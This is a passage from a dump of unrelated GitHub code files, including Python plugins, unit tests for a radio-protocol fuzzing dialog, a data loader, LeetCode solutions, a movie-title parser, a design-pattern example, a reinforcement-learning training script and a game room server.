:]\n\n return result\n\n\ndef load_plugin():\n if os.environ.get(\"PGZERO_MODE\", \"False\").lower() == \"false\":\n return\n\n get_backend().add_ast_postprocessor(augment_ast)\n MainCPythonBackend._original_editor_autocomplete = MainCPythonBackend._cmd_editor_autocomplete\n MainCPythonBackend._cmd_editor_autocomplete = patched_editor_autocomplete\n","repo_name":"thonny/thonny","sub_path":"thonny/plugins/backend/pgzero_backend.py","file_name":"pgzero_backend.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":2704,"dataset":"github-code","pt":"96"} +{"seq_id":"18279574845","text":"import sys, os\n\n\npaths = []\npages = []\n\nHTMLs = []\n\ndef start(args):\n paths = os.listdir(\"py-page\")\n for file in paths:\n if(file.endswith(\".py\")):\n dot_pos = len(file) - 3\n pages.append(file[:dot_pos])\n\n sys.path.insert(0, \"py-page\")\n\n for page in pages:\n load = __import__(page)\n\n HTMLs.append(load.get_result(args))\n return HTMLs\n","repo_name":"francescoridolfi/neWeb","sub_path":"neWeb_loader.py","file_name":"neWeb_loader.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"8255687867","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtTest import QTest\n\nfrom tests.QtTestCase import QtTestCase\nfrom urh import settings\nfrom urh.controller.dialogs.FuzzingDialog import FuzzingDialog\nfrom urh.signalprocessing.Encoding import Encoding\nfrom urh.signalprocessing.Modulator import Modulator\n\n\nclass TestFuzzingDialog(QtTestCase):\n def setUp(self):\n super().setUp()\n self.add_signal_to_form(\"steckdose_anlernen.complex\")\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxNoiseTreshold.setValue(0.06)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxNoiseTreshold.editingFinished.emit()\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxCenterOffset.setValue(-0.0127)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxCenterOffset.editingFinished.emit()\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxSamplesPerSymbol.setValue(100)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxSamplesPerSymbol.editingFinished.emit()\n\n self.gframe = self.form.generator_tab_controller\n self.gframe.ui.cbViewType.setCurrentIndex(1) # hex view\n self.gframe.modulators.append(Modulator(\"Prevent Modulation bootstrap when adding first protocol\"))\n self.gframe.refresh_modulators()\n\n # Dewhitening mit SyncByte 0x9a7d9a7d, Data Whitening Poly 0x21, Compute and apply CRC16 via X0r,\n # Rest auf False anlegen und setzen\n self.form.ui.tabWidget.setCurrentIndex(1)\n self.form.compare_frame_controller.ui.cbProtoView.setCurrentIndex(1) # Hex\n decoding = Encoding([\"Data Whitening\", settings.DECODING_DATAWHITENING, \"0x9a7d9a7d;0x21\"])\n self.form.compare_frame_controller.decodings.append(decoding)\n self.form.compare_frame_controller.ui.cbDecoding.addItem(decoding.name)\n self.form.compare_frame_controller.set_decoding(decoding)\n\n # Serial Part 1: Bits 207-226 (Dezimal: 91412) (20 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=206, end=225, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n # Zeros: Bits 227-244 (18 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=226, end=243, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n # Serial Part 2: Bit 245 - 264 (Dezimal: 1034678) (20 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=244, end=263, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n self.form.ui.tabWidget.setCurrentIndex(2)\n item = self.gframe.tree_model.rootItem.children[0].children[0]\n index = self.gframe.tree_model.createIndex(0, 0, item)\n rect = self.gframe.ui.treeProtocols.visualRect(index)\n\n self.assertEqual(len(self.gframe.ui.treeProtocols.selectedIndexes()), 0)\n QTest.mousePress(self.gframe.ui.treeProtocols.viewport(), Qt.LeftButton, pos = rect.center())\n self.assertEqual(self.gframe.ui.treeProtocols.selectedIndexes()[0], index)\n mimedata = self.gframe.tree_model.mimeData(self.gframe.ui.treeProtocols.selectedIndexes())\n self.gframe.table_model.dropMimeData(mimedata, 1, -1, -1, self.gframe.table_model.createIndex(0, 0))\n\n self.assertEqual(self.gframe.table_model.row_count, 1)\n self.assertEqual(len(self.gframe.table_model.protocol.protocol_labels), 3)\n\n self.dialog = FuzzingDialog(protocol=self.gframe.table_model.protocol, label_index=0, msg_index=0,\n proto_view=0, parent=self.gframe)\n self.dialog.finished.connect(self.gframe.refresh_label_list)\n self.dialog.finished.connect(self.gframe.refresh_table)\n self.dialog.finished.connect(self.gframe.set_fuzzing_ui_status)\n\n if self.SHOW:\n self.dialog.show()\n\n def test_fuzz_label_bit(self):\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"00010110010100010100\") # Serial Part 1\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(1)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"000000000000000000\") # Zeros\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(2)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"11111100100110110110\") # Serial Part 2\n\n def test_fuzz_label_hex(self):\n for message in self.gframe.table_model.protocol.messages:\n message.align_labels = False\n\n self.dialog.proto_view = 1\n\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"c5945\") # Serial Part 1\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(1)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"00000\") # Zeros\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(2)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"fc9b6\") # Serial Part 2\n\n def test_add_remove_fuzzing_data(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 1)\n self.dialog.ui.btnAddRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.data[1], \"00010110010100010101\") # serial part 1\n self.dialog.ui.btnAddRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.data[2], \"00010110010100010110\") # serial part 1\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 3)\n self.dialog.ui.btnDelRow.click()\n self.dialog.ui.btnDelRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 1)\n\n def test_adding_fuzzing_range(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.sBAddRangeStart.setValue(10)\n self.dialog.ui.sBAddRangeEnd.setValue(100)\n self.dialog.ui.sBAddRangeStep.setValue(20)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(6, self.dialog.fuzz_table_model.rowCount())\n\n def test_adding_fuzzing_boundaries(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.spinBoxLowerBound.setValue(2)\n self.dialog.ui.spinBoxUpperBound.setValue(200)\n self.dialog.ui.spinBoxBoundaryNumber.setValue(2)\n self.dialog.ui.comboBoxStrategy.setCurrentIndex(1)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(5, self.dialog.fuzz_table_model.rowCount())\n\n def test_adding_fuzzing_random_values(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.spinBoxNumberRandom.setValue(10)\n self.dialog.ui.comboBoxStrategy.setCurrentIndex(2)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(11, self.dialog.fuzz_table_model.rowCount())\n\n def test_remove_duplicates(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.sBAddRangeStart.setValue(10)\n self.dialog.ui.sBAddRangeEnd.setValue(50)\n self.dialog.ui.sBAddRangeStep.setValue(5)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.btnAddFuzzingValues.click()\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(28, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.chkBRemoveDuplicates.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n","repo_name":"jopohl/urh","sub_path":"tests/test_fuzzing_dialog.py","file_name":"test_fuzzing_dialog.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":9873,"dataset":"github-code","pt":"96"} +{"seq_id":"40930687560","text":"davi=str(input('primeiro aluno:'))\ngledson=str(input('segundo aluno:'))\nsilva=str(input('terceiro aluno:'))\nbene=str(input('quarto aluno:'))\n\nlista=[davi, gledson, silva, bene]\n\nimport random\n\ns=random.choice(lista)\nprint(f'o aluno escolhido foi {s}')","repo_name":"davigledson/Curso-de-Python-do-CursoemVideo","sub_path":"CursoEmVídeo/Mundo01/03-Utilizando Módulos/desafio019 - Sorteando um item na lista.py","file_name":"desafio019 - Sorteando um item na lista.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"gl","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"41785539925","text":"import csv\nimport datetime\n\nfrom app import models\nfrom app.database import SessionLocal, engine\n\ndb = SessionLocal()\n\nmodels.Base.metadata.create_all(bind=engine)\n\nwith open(\"sars_2003_complete_dataset_clean.csv\", \"r\") as f:\n csv_reader = csv.DictReader(f)\n\n for row in csv_reader:\n db_record = models.Record(\n date=datetime.datetime.strptime(row[\"date\"], \"%Y-%m-%d\"),\n country=row[\"country\"],\n cases=row[\"cases\"],\n deaths=row[\"deaths\"],\n recoveries=row[\"recoveries\"],\n )\n db.add(db_record)\n\n db.commit()\n\ndb.close()\n","repo_name":"edkrueger/sars-fastapi","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"96"} +{"seq_id":"14301067535","text":"'''\nhttps://leetcode.com/problems/continuous-subarray-sum/\n2021/10\n904 ms\n'''\n\nclass Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n summ, remainders = 0, {0: -1}\n for i in range(0, len(nums)):\n summ = (summ + nums[i]) % k\n if summ in remainders:\n if i - remainders[summ] > 1:\n return True\n else:\n remainders[summ] = i\n return False\n","repo_name":"zvant/LeetCodeSolutions","sub_path":"0523.continuous_subarray_sum_M.py","file_name":"0523.continuous_subarray_sum_M.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"443147864","text":"class Solution:\n def containsDuplicate(self, nums) -> bool:\n caching = set()\n\n for value in nums:\n if value not in caching:\n caching.add(value)\n else:\n return True\n\n return False\n\n #TC: O(N)\n #SC: O(N)","repo_name":"LuanGolivr/AlgorithmProblems","sub_path":"LeetCodeProblems/python/217_ContainsDuplicate.py","file_name":"217_ContainsDuplicate.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32210616735","text":"#include\r\n\r\nt = int(input())\r\n\r\nfor c in range(0, t):\r\n n = input().split()\r\n\r\n x, y = int(n[0]), int(n[1])\r\n\r\n if y == 0:\r\n print('divisao impossivel')\r\n else:\r\n print('%.1f' %(x / y))","repo_name":"LinconRozendo/URI","sub_path":"1116.py","file_name":"1116.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73090757435","text":"import datetime\nimport re\n\nimport utils\nfrom movie import Movie\n\n# black words in file names\nblackwords = [\n # video type\n 'DVDRip', 'HD-DVD', 'HDDVD', 'HDDVDRip', 'BluRay', 'Blu-ray', 'BDRip', 'BRRip',\n 'HDRip', 'DVD', 'DVDivX', 'HDTV', 'DVB', 'DVBRip', 'PDTV', 'WEBRip', 'DVDSCR',\n 'Screener', 'VHS', 'VIDEO_TS',\n # screen\n '720p', '720',\n # video codec\n 'XviD', 'DivX', 'x264', 'h264', 'Rv10',\n # audio codec\n 'AC3', 'DTS', 'He-AAC', 'AAC-He', 'AAC', '5.1',\n # ripper teams\n 'ESiR', 'WAF', 'SEPTiC', '[XCT]', 'iNT', 'PUKKA', 'CHD', 'ViTE', 'TLF',\n 'DEiTY', 'FLAiTE', 'MDX', 'GM4F', 'DVL', 'SVD', 'iLUMiNADOS',\n 'UnSeeN', 'aXXo', 'KLAXXON', 'NoTV', 'ZeaL', 'LOL'\n]\n\n\ndef guess_info(title):\n \"\"\"\n given a title, tries to guess as much information as possible.\n\n guessed information:\n title, year, language, part\n \"\"\"\n\n # create info dictionary\n info = dict()\n # guess year\n title, year = guess_year_(title)\n if year != None:\n info.update({Movie.YEAR: year})\n # guess language\n title, language = guess_language_(title)\n if language != None:\n info.update({Movie.LANGUAGE: language})\n # guess part\n title, part = guess_part_(title)\n if part != None:\n info.update({Movie.PART: part})\n # guess subtitles\n title, subtitles = guess_subtitles_(title)\n if subtitles != None:\n info.update({Movie.SUBTITLES: subtitles})\n # clean title\n title = clean_title_(title)\n info.update({Movie.TITLE: title})\n # return guessed information\n return info\n\n\ndef guess_year_(title):\n \"\"\"\n looks for year patterns, and return found year\n\n note this only looks for valid production years, that is between 1920\n and now + 5 years, so for instance 2000 would be returned as a valid\n year but 1492 would not\n \"\"\"\n\n year = None\n # search for year pattern (4 consequent digit)\n match = re.search(r'[0-9]{4}', title)\n # if found, check if year is between 1920 and now + 5 years\n if match \\\n and 1920 < int(match.group(0)) < datetime.date.today().year + 5:\n year = match.group(0)\n # remove year from title\n title = title[:match.start()] + title[match.end():]\n return title, year\n\n\ndef guess_language_(title):\n \"\"\"\n guess movie language, looking for ISO language representation in title\n \"\"\"\n\n language = None\n match = re.search(r'\\b([a-zA-Z]{3})\\b', title)\n if match:\n # get corresponding language, given 3-letters ISO language code found\n language = utils.alpha3_to_language(match.group(0))\n # language detected\n if language != None:\n # remove language from title\n title = title[:match.start()] + title[match.end():]\n return title, language\n\n\ndef guess_subtitles_(title):\n \"\"\"\n guess subtitles subtitles, looking for ISO subtitles representation in title\n \"\"\"\n\n subtitles = None\n match = re.search(r'(?:[^a-zA-Z0-9]sub )([a-zA-Z]{3})(?:[^a-zA-Z0-9])', title)\n if match:\n # get corresponding subtitles, given 3-letters ISO subtitles code found\n subtitles = utils.alpha3_to_language(match.group(1))\n # subtitles detected\n if subtitles != None:\n # remove subtitles from title\n title = title[:match.start() + 1] + title[match.end() - 1:]\n return title, subtitles\n\n\ndef guess_part_(title):\n \"\"\"\n guess movie part, e.g. CD1 -> 1\n \"\"\"\n\n part = None\n # search part, which can be like, for example, disk1 or disk 1\n match = re.search(r'(?:cd|disk|part[ ]?)(\\d)', title, re.IGNORECASE)\n if match:\n # get part number\n part = match.group(1)\n # remove part from title\n title = title[:match.start()] + title[match.end():]\n return title, part\n\n\ndef clean_title_(title):\n # remove everything inside parenthesis\n title = re.sub('[([{].*?[)\\]}]', ' ', title)\n # replace dots, underscores and dashes with spaces\n title = re.sub(r'[._-]', ' ', title)\n stitle = title.split()\n title = []\n # loop on name\n # keep only words which are not black words\n for word in stitle:\n is_not_a_blackword = True\n for blackword in blackwords:\n if word.lower() == blackword.lower():\n is_not_a_blackword = False\n break\n if is_not_a_blackword:\n title.append(word)\n else:\n break\n title = ' '.join(title)\n return title\n","repo_name":"albemala/almoviesrenamer","sub_path":"src/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"72666843516","text":"\"\"\"\nCOMMAND DESIGN PATTERN\n=======================\n\nCommand deisgn pattern is another design pattern that deal withs \nimplementations of tracing the changes, do and undo operations.\n\nHere in the example below, we have combined this idea with COMPOSITE DESIGN PATTERN.\n\nWe have below classes:\n1. Bank Account : Responsible for creating bank account for a Customer\n2. Abstract class Command : This basically is meant to invoke functionality of the COMMAND\n design pattern.\n 1. INVOKE : Execute what ever BankAccount operation is like DEPOSIT / WITHDRAW\n 2. UNDO : Undoe the last operation.\n3. BankAccountCommand : This helps in creating Bank account for customers and associates\n command pattern functionality by inheriting the above abstract class.\n4. CompositeBankAccountCommand : This class converts / implements composite pattern.\n Takes in list of accounts (BankAccountCommand) and applies functionality for group /\n single account\n5. WithdrawTransferCommand: Takes in the CompositeBankAccountCommand as input with from and\n to account and the amount to transfer. Then executes the intended functionality.\n\n\nLet's see the implementation as below.\n\n\"\"\"\n\nfrom abc import ABC\nfrom enum import Enum\nimport unittest\n\n\nclass BankAccount:\n \"\"\"\n Class for creating the bank account for any customer\n \"\"\"\n\n OVERDRAFTLIMIT = -500\n\n def __init__(self, name, amount) -> None:\n \"\"\"\n Init a bank account for cusotmer\n \"\"\"\n self.name = name\n self.amount = amount\n\n def deposit(self, amount):\n \"\"\"\n Given the amount, increment the amount for the Bank account holder\n\n Args:\n amount (int): Amount to deposite in the account\n\n Return:\n None\n \"\"\"\n self.amount += amount\n\n def withdraw(self, amount):\n \"\"\"\n Given the amount, decrement the amount for the Bank account holder\n\n Args:\n amount (int): Amount to withdraw from the account\n\n Return:\n bool: True if can withdraw else False\n \"\"\"\n if self.amount - amount >= BankAccount.OVERDRAFTLIMIT:\n self.amount -= amount\n return True\n return False\n\n def __str__(self) -> str:\n \"\"\"\n String representation of the object\n \"\"\"\n return f'AC Name {self.name}, balance : {self.amount}'\n\n\nclass Command(ABC):\n \"\"\"\n Abstract class Command : This basically is meant to invoke functionality of the COMMAND\n design pattern.\n 1. INVOKE : Execute what ever BankAccount operation is like DEPOSIT / WITHDRAW\n 2. UNDO : Undoe the last operation.\n \"\"\"\n\n def __init__(self) -> None:\n self.success = False\n\n def invoke(self):\n pass\n\n def undo(self):\n pass\n\nclass BankAccountCommand(Command):\n \"\"\"\n BankAccountCommand : This helps in creating Bank account for customers\n and associates command pattern functionality by inheriting the above\n abstract class.\n \"\"\"\n\n class Action(Enum):\n DEPOSIT = 0\n WITHDRAW = 1\n\n def __init__(self, account, action, amount) -> None:\n super().__init__()\n self.account = account\n self.action = action\n self.amount = amount\n\n def invoke(self):\n \"\"\"\n Depending on the action to take, calls respective action for the\n account.\n \"\"\"\n if self.action == self.Action.WITHDRAW:\n self.success = self.account.withdraw(self.amount)\n\n elif self.action == self.Action.DEPOSIT:\n self.account.deposit(self.amount)\n self.success = True\n\n def undo(self):\n \"\"\"\n Does the polar opposite of the last action\n \"\"\"\n if self.action == self.Action.WITHDRAW:\n self.account.deposit(self.amount)\n\n elif self.action == self.Action.DEPOSIT:\n self.account.withdraw(self.amount)\n\n\nif __name__ == '__main__':\n ba1 = BankAccount(\"Amitabh\", 0)\n ba2 = BankAccount(\"Shweta\", 0)\n\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\n bac1 = BankAccountCommand(ba1, BankAccountCommand.Action.DEPOSIT, 500)\n bac2 = BankAccountCommand(ba2, BankAccountCommand.Action.DEPOSIT, 1000)\n\n bac1.invoke()\n bac2.invoke()\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\n bac1.undo()\n bac2.undo()\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\nOUTPUT = r\"\"\"\nBA1 : AC Name Amitabh, balance : 0\nBA2 : AC Name Shweta, balance : 0\nBA1 : AC Name Amitabh, balance : 500\nBA2 : AC Name Shweta, balance : 1000\nBA1 : AC Name Amitabh, balance : 0\nBA2 : AC Name Shweta, balance : 0\n\"\"\"\n","repo_name":"Amitabh1989/Design-Patterns-with-Python","sub_path":"_13_Command_Design_Pattern/_01_command_basic.py","file_name":"_01_command_basic.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"23093267877","text":"import os\nimport logging\n\nfrom stable_baselines3.ppo.ppo import PPO\nfrom stable_baselines3.common.vec_env.subproc_vec_env import SubprocVecEnv\nfrom stable_baselines3.common.vec_env.vec_monitor import VecMonitor\nfrom bandit.env import make_env\n\nfrom bandit.model import CustomCombinedExtractor\n\n\ndef main(args):\n \"\"\"\n Example to set a training process with Stable Baselines 3\n Loads a scene and starts the training process for a navigation task with images using PPO\n Saves the checkpoint and loads it again\n \"\"\"\n num_environments = 8\n\n # Multiprocess\n env = SubprocVecEnv([make_env(i) for i in range(num_environments)])\n env = VecMonitor(env)\n\n # Obtain the arguments/parameters for the policy and create the PPO model\n save_dir = \"experiments\"\n experiment_name = args.name\n log_dir = os.path.join(save_dir, experiment_name, \"log\")\n checkpoints_dir = os.path.join(save_dir, experiment_name, \"checkpoints\")\n\n os.makedirs(log_dir, exist_ok=True)\n os.makedirs(checkpoints_dir, exist_ok=True)\n\n policy_kwargs = dict(\n features_extractor_class=CustomCombinedExtractor,\n )\n\n model = PPO(\n \"MultiInputPolicy\",\n env,\n verbose=1,\n learning_rate=1e-5, # This is key\n tensorboard_log=log_dir,\n policy_kwargs=policy_kwargs,\n )\n print(model.policy)\n\n # Train the model for the given number of steps\n total_timesteps = 1000\n for i in range(100):\n model.learn(total_timesteps, reset_num_timesteps=False)\n # Save the trained model and delete it\n model.save(os.path.join(checkpoints_dir, f\"ckpt-{i*total_timesteps}\"))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--name\",\n \"-n\",\n default=\"test\",\n help=\"name to save experiment under\",\n )\n args = parser.parse_args()\n logging.basicConfig(level=logging.INFO)\n main(args)\n","repo_name":"mjlbach/bandits-sb3","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"44603844802","text":"\"\"\"\nRoom instance\nAuthor: Alex (TheAmazingAussie)\n\"\"\"\n\nimport game\nimport asyncoro\nfrom database import database_access as dao\nfrom managers.room.room_data import RoomData\nfrom managers.room.room_tasks import RoomTasks\nfrom managers.room.room_mapping import RoomMapping\nfrom managers.clients.session import Session\n\nfrom communication.messages.outgoing.room.RoomModelMessageComposer import *\nfrom communication.messages.outgoing.room.RoomRatingMessageComposer import *\nfrom communication.messages.outgoing.room.RoomSpacesMessageComposer import *\nfrom communication.messages.outgoing.room.RightsLevelMessageComposer import *\nfrom communication.messages.outgoing.room.NoRightsMessageComposer import *\nfrom communication.messages.outgoing.room.YouAreOwnerComposer import *\nfrom communication.messages.outgoing.room.PrepareRoomMessageComposer import *\nfrom communication.messages.outgoing.room.HotelViewMessageComposer import *\nfrom communication.messages.outgoing.room.RoomDataMessageComposer import *\nfrom communication.messages.outgoing.room.heightmap.FloorMapMessageComposer import *\nfrom communication.messages.outgoing.room.heightmap.HeightMapMessageComposer import *\n\nfrom communication.messages.outgoing.room.user.RoomOwnerRightsComposer import *\nfrom communication.messages.outgoing.room.user.UserStatusMessageComposer import *\nfrom communication.messages.outgoing.room.user.UserDisplayMessageComposer import *\nfrom communication.messages.outgoing.room.user.RemoveUserMessageComposer import *\n\n\nclass Room:\n def __init__(self):\n self.disposed = False\n self.data = RoomData()\n self.virtual_counter = -1\n self.entities = []\n self.cycle = None\n self.room_tasks = RoomTasks(self)\n self.room_mapping = RoomMapping(self)\n\n def init_features(self):\n \"\"\"\n Load features of the room, eg thread for walking\n :return:\n \"\"\"\n\n print (\"topkappa\")\n\n # Fill map with points which aren't availiable\n self.room_mapping.regenerate_collision_map()\n\n # Start thread for room tasks\n self.cycle = asyncoro.Coro(self.room_tasks.start_cycle)\n\n def has_rights(self, user_id, only_owner_check):\n\n return self.data.owner_id == user_id\n\n\n def load_room(self, session):\n \"\"\"\n Load room information for player\n :param session: the player entering room\n :return:\n \"\"\"\n\n room_user = session.room_user\n\n # Leave previous room if the user was already in a different room\n #if room_user.room is not None:\n # room_user.room.leave_room(session, False)\n\n room_user.room = self\n\n room_user.is_loading_room = True\n room_user.statuses.clear()\n\n # Initalise room loading\n session.send(RoomModelMessageComposer(self.get_model().name, self.data.id))\n session.send(RoomRatingMessageComposer(self.data.score))\n\n floor_data = int(self.data.floor)\n wall_data = int(self.data.wall)\n\n # Floor design\n if floor_data > 0:\n session.send(RoomSpacesMessageComposer(\"floor\", self.data.floor))\n\n # Wall design\n if wall_data > 0:\n session.send(RoomSpacesMessageComposer(\"wall\", self.data.wall))\n\n # Landscape design\n session.send(RoomSpacesMessageComposer(\"landscape\", self.data.landscape))\n\n # Send rights\n if self.has_rights(session.details.id, True):\n\n session.room_user.statuses[\"flatctrl\"] = \"useradmin\"\n session.send(YouAreOwnerComposer())\n session.send(RightsLevelMessageComposer(4))\n\n elif self.has_rights(session.details.id, False):\n\n session.room_user.statuses[\"flatctrl\"] = \"1\"\n session.send(RightsLevelMessageComposer(1))\n else:\n session.send(NoRightsMessageComposer())\n\n session.send(PrepareRoomMessageComposer(self.data.id))\n\n def load_heightmap(self, session):\n \"\"\"\n Load all heightmap data, walls and furniture items\n :param session: the player to send the data to\n :return: None\n \"\"\"\n\n session.send(HeightMapMessageComposer(self, self.get_model().map_size_x, self.get_model().map_size_y))\n session.send(FloorMapMessageComposer(self))\n\n room_user = session.room_user\n room_user.virtual_id = self.get_virtual_id()\n\n # Finished loading room\n room_user.is_loading_room = False\n\n # Set position shit\n room_user.position = self.get_model().get_door_point()\n room_user.set_rotation(self.get_model().door_rotation, True, False)\n\n # Display self\n self.send(UserDisplayMessageComposer([session]))\n self.send(UserStatusMessageComposer([session]))\n\n # Add user\n self.data.users_now += 1\n self.entities.append(session)\n\n # Load features if no one was in room\n if len(self.get_players()) == 1:\n self.init_features()\n\n # Display users for client\n session.send(UserDisplayMessageComposer(self.entities))\n session.send(UserStatusMessageComposer(self.entities))\n\n # Normal has rights for general users\n is_owner = self.has_rights(session.details.id, True)\n session.send(RoomOwnerRightsComposer(self.data.id, is_owner))\n\n # Send room info... again\n #session.send(RoomDataMessageComposer(self, session, True, True))\n\n def leave_room(self, session, hotel_view, dispose=True):\n \"\"\"\n Kick user from room, will lower room population\n :param session: player to leave room\n :param hotel_view: optional to send them to hotel view\n :return:\n \"\"\"\n if hotel_view:\n session.send(HotelViewMessageComposer())\n\n if self.entities is not None:\n if session in self.entities:\n self.data.users_now -= 1\n self.entities.remove(session)\n\n # Remove user from room\n if len(self.get_players()) > 0:\n self.send(RemoveUserMessageComposer(session.room_user.virtual_id))\n\n room_user = session.room_user\n room_user.stop_walking(False)\n room_user.reset()\n\n if dispose:\n self.dispose()\n\n def get_virtual_id(self):\n \"\"\"\n Virtual room user identification\n :return: None\n \"\"\"\n self.virtual_counter += 1\n return self.virtual_counter\n\n def send(self, message):\n \"\"\"\n Sends room message to all players in room\n :param message: the message, will be passed through message encoder\n :return: None\n \"\"\"\n for entity in self.get_players():\n entity.send(message)\n\n def get_model(self):\n \"\"\"\n Returns the room model instance for this room instance\n :return: room_model.py python module\n \"\"\"\n return dao.room_dao.room_models[self.data.model]\n\n def get_players(self):\n \"\"\"\n Get all players currently in room\n :return: array of connected sessions\n \"\"\"\n\n return [player for player in self.entities if type(player) == Session]\n\n def in_room(self, entity_id):\n \"\"\"\n Returns true if the entity is in a room with the given id\n :param entity_id: the unique id for the entity, from the database\n :return:\n \"\"\"\n\n return len([entity for entity in self.entities if entity.details.id == entity_id]) > 0\n\n def dispose(self, force_disposal=False):\n \"\"\"\n Dispose all data\n :param force_disposal:\n :return:\n \"\"\"\n if self.disposed:\n return\n\n\n # Force disposal of all data, kick users when user deletes room\n if force_disposal:\n\n self.data.dispose()\n del self.data\n\n # Call method to erase data that share common dispose calls\n self.__reset_state()\n self.__erase()\n\n if len(self.get_players()) == 0:\n\n # If there's no users, then them we reset the state of the room for items to be loaded again\n # amongst other things\n self.__reset_state()\n\n # Delete from room collection if owner goes offline and there's no more users in the room\n if game.session_manager.find_by_id(self.data.owner_id) is None and self.data.type == 0:\n\n # Call method to erase data that share common dispose calls\n self.__erase()\n\n def __reset_state(self):\n \"\"\"\n Reset all states, reset virtual id, clear furniture, AI, pets, etc\n :return:\n \"\"\"\n\n if self.disposed:\n return\n\n self.virtual_counter = -1\n self.room_mapping.dispose()\n\n # Terminate room cycle\n if self.cycle is not None:\n self.cycle.terminate()\n\n return\n\n def __erase(self):\n \"\"\"\n This method is called when both dispose types share same data which needs to be removed\n :return:\n \"\"\"\n\n print (\"[UNLOAD] Room with id (\" + str(self.data.id) + \") is disposed\")\n\n game.room_manager.rooms.pop(self.data.id, None)\n\n self.room_tasks.dispose()\n self.entities.clear()\n\n del self.room_tasks\n del self.entities\n del self.room_mapping\n del self.data\n\n self.disposed = True\n\n\n\n\n","repo_name":"Quackster/Icarus-Python","sub_path":"managers/room/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72542348156","text":"from dataclasses import dataclass\nfrom os import environ\nfrom typing import List, Optional\nfrom result import Result\nfrom src.domain.dip_client_error import DIPClientError\nfrom src.domain.hardware_video_message import COMMON_INCOMING_VIDEO_MESSAGE, COMMON_OUTGOING_VIDEO_MESSAGE, \\\n HardwareVideoMessage, InternalStartLifecycle, 